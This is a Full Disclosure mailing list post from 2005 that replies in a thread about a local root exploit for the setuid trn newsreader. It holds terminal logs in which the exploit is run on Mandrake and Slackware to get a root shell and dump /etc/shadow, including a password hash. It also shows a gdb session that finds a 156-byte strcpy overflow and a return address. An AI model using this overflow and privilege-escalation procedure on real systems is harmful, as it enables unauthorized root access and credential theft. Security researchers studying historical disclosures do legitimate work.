Full Disclosure mailing list archives

Re: /usr/bin/trn local root exploit

From: "Z z a g o r R" <zzagorrzzagorr () hotmail com>
Date: Wed, 26 Jan 2005 13:24:21 +0000

/*
---------------------------------------
TEST MANDRAKE 9.2
sh-2.05b# cat /proc/version

Linux version 2.4.22-10mdk (nplanel () no mandrakesoft com) (gcc version 3.3.1(Mandrake Linux 9.2 3.3.1-2mdk)) #1 Thu Sep 18 12:30:58 CEST 2003

sh-2.05b# rpm -qa trn
trn-3.6-17mdk
sh-2.05b# chmod +s /usr/bin/trn
chmod +s /usr/bin/trn
sh-2.05b#
sh-2.05b# ls -al /usr/bin/trn
ls -al /usr/bin/trn
-rwsr-sr-x    1 root     root       233624 Jan 10  2003 /usr/bin/trn
sh-2.05b# exit
sh-2.05b$ ./trn 0xbfffff96
sh-2.05b# id
uid=0(root) gid=4294967295 groups=4294967295
sh-2.05b#
sh-2.05b# cat /etc/shadow
cat /etc/shadow
root:$1$HC7/pHcz$L0w/RpmeVEF9Xbnf7iHjv/:12554:0:99999:7:::
....
---------------------------------------
TEST SLACKWARE 10.0.0(not suid)
bash-2.05b$ cat /etc/slackware-version
Slackware 10.0.0
bash-2.05b$ cat /proc/version

Linux version 2.4.26 (root@root) (gcc version 3.3.4) #2 Mon Jun 14 19:05:05PDT 2004

bash-2.05b$ uname -a

Linux nyg 2.4.26 #2 Mon Jun 14 19:05:05 PDT 2004 i686 unknown unknownGNU/Linux

bash-2.05b$ ./a 0xbfffff98
sh-2.05b$
----------------------------------------
TEST SLACKWARE 9.1.0
sh-2.05b$ ./trn 0xbfffff84
./trn 0xbfffff84
sh-2.05b#
sh-2.05b# id
id
uid=0(root) gid=98(nobody) groups=98(nobody)
*/
/*
RETADDR?(mandrake...)
sh-2.05b$ gdb ./trn
gdb ./trn
GNU gdb 5.3-25mdk (Mandrake Linux)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certainconditions.

Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...
(no debugging symbols found)...
(gdb)
(gdb) r `perl -e 'print "A" x 156'`     --------->BUFFER=>156
(gdb) r `perl -e 'print "A" x 156'`
Starting program: /usr/bin/trn `perl -e 'print "A" x 156'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x0805ad05 in strcpy ()
(gdb) i r
eax            0x0      0
ecx            0x8087244        134771268
edx            0xbffff850       -1073743792
ebx            0x41414141       1094795585
esp            0xbffff931       0xbffff931
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x805ad05        0x805ad05
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x0      0
ftag           0xffff   65535
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0
mxcsr          0x1f80   8064
orig_eax       0xffffffff       -1
(gdb) x/1000x $esp
0xbffff931:     0x2c080872      0x01bfffff      0x01000000      0x41000000
.
..
...
---Type <return> to continue, or q <return> to quit---
....
.....
......
---Type <return> to continue, or q <return> to quit---
.......
........
.........
---Type <return> to continue, or q <return> to quit---
..........
...........
............
---Type <return> to continue, or q <return> to quit---
0xbffffef1:     0x0effffff      0xff000000      0x0fffffff      0x1a000000
0xbfffff01:     0x00bfffff      0x00000000      0x00000000      0x00000000
0xbfffff11:     0x00000000      0x00000000      0x38366900      0x752f0036
0xbfffff21:     0x622f7273      0x742f6e69      0x41006e72      0x41414141
0xbfffff31:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff41:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff51:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff61:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff71:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff81:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffff91:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffa1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffb1:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffffc1:     0x41414141      0x00414141      0x622f3d5f      0x732f6e69
0xbfffffd1:     0x57500068      0x752f3d44      0x622f7273      0x48006e69
0xbfffffe1:     0x3d454d4f      0x4853002f      0x3d4c564c      0x752f0031

0xbffffff1: 0x622f7273 0x742f6e69 0x00006e72 Cannotaccess memory at address 0xbffffffd

(gdb)
*/

_________________________________________________________________

En etkili ve güvenilir PC Korumayi tercih edin, rahat edin!http://www.msn.com.tr/security/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

/usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)
  - Re: Re: /usr/bin/trn local root exploit Honza Vlach (Jan 26)
  - Re: /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit Frank Thyes (Jan 26)
- <Possible follow-ups>
- Re: /usr/bin/trn local root exploit ntx0f (Jan 27)
  - Re: /usr/bin/trn local root exploit Wojciech Pawlikowski (Jan 27)